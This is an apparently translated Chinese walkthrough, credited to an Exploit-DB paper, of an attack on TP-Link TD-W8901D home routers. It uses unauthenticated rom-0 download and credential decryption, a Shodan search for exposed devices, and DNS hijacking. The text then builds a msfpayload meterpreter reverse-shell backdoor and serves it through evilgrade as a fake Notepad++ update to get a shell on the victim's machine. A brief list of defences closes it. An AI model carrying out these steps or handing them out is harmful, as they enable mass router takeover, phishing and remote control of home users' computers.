from: http://www.exploit-db.com/wp-content/themes/exploit/docs/33369.pdf
一臺筆記本電腦 TD-W8901D路由器(firmware 6.0.0) 虛擬機(WIN7)、Kali Linux(攻擊機)、evilgrade(一個模塊化的腳本框架,可實現偽造的升級、自帶DNS和WEB服務模塊,http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt) Metasploit。
互聯網攻擊示意圖:
局域網攻擊示意圖
市場上有很多類型的路由器可用,但絕大部分從未升級固件,所以可對大多數家用路由進行這個攻擊,在這個項目中使用的是最常見的TPlink路由器。
TPLINK某些版本有一個關鍵的漏洞:未授權訪問Firmware/Romfile界面,無需登陸密碼,像這樣http://IP//rpFWUpload.html。
同時也可以下載romfile備份文件(rom-0),像這樣:http://IP address/rom-0。
步驟一:下載rom文件 
下載回來的rom文件需要逆向工程得到明文密碼,但有一個更簡單的方法,去俄羅斯的一個網站可以解密 http://www.hakim.ws/huawei/rom-0/
步驟二:使用賬號密碼登陸 
第三步:使用搜索引擎SHODAN 搜索RomPager,可在互聯網上找到700多萬個這種設備 
簡單的改變一下路由器的DNS,就可以重定向用戶的請求,這個方法可以用來釣魚(從我了解的情況看來,國內已經有大批路由被利用,并已經被黑產用作釣魚欺詐,黑產表打我,我猜的)。但這個太簡單了,作者希望玩的更高(hua)深(shao)一些。
默認DNS的配置是這樣: 
改成攻擊者自己的DNS:
攻擊系統:DNS服務器一臺、kali預裝了evilgrade 和metasploit。
第五步:建一個帶后門的payload,給用戶發送升級指令。LHOST= 攻擊者機器IP和 LPORT =任何開放的端口。
Commad:@@# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.5.132 LPORT=8080 x > navebackdoor.exe
第六步:啟動metasploit、運行payload
? 
第七步:設置監聽主機和監聽端口,命令:set LHOST(攻擊者的IP)、set LPORT(監聽端口,創建后門時分配的)、exploit(進行攻擊)
第八步:啟動假的WEB升級服務器evilgrade,執行show modules后,可以看到很多假更新模塊,這里選用notepadplus
第九步:show options可以看到模塊的使用方法,設置后門升級文件路徑使用agent:
Set ?agent ?‘[“<%OUT%>/root/Desktop/navebackdoor.exe<%OUT%>”]’
第十步:完成以上動作后,啟動EvilGrade的WEB服務器:
start
第十一步:等受害者打開notepadplus,一旦打開就會彈出要求更新的提示,更新過程中將會加載我們的后門程序。
第十二步:在攻擊機器上,evilgrade和Metasploit建立會話,等待返回的shell
第十三步:拿到shell,使用sysinfo查看一下:
輸入help可以看到很多命令,包括scrrenshot、killav,運行vnc 等
經常升級你的路由器版本
路由器不要在公網暴露
系統和軟件升級時檢查證書
設置靜態IP,比如google的8.8.8.8、8.8.4.4(廣告:阿里巴巴的公共dns 223.5.5.5 和 223.6.6.6)